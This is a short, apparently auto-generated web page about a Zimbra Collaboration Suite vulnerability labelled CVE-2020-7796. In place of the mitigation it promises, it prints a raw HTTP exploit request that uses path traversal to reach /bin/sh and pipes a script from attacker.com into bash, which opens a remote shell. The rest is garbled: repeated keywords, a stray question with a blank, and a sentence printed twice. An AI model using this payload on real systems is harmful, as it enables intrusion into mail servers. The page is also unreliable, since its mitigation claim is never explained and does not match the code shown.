Cve20207796: Zimbra Collaboration Suite [patched] Full

If patching cannot be executed immediately, administrators can remove the specific exposed file manually to stop the exploit vector:

GET /service/extension/UserServlet?ext=com.zimbra.cs.extension.ExtensionUtil&file=../../../../../../../bin/sh&-c$IFScurl$IFSattacker.com/shell.sh|bash HTTP/1.1 Host: victim.zimbra.com cve20207796 zimbra collaboration suite full

Are you looking to learn about (e.g., from 2023 or 2024)? Share public link If patching cannot be executed immediately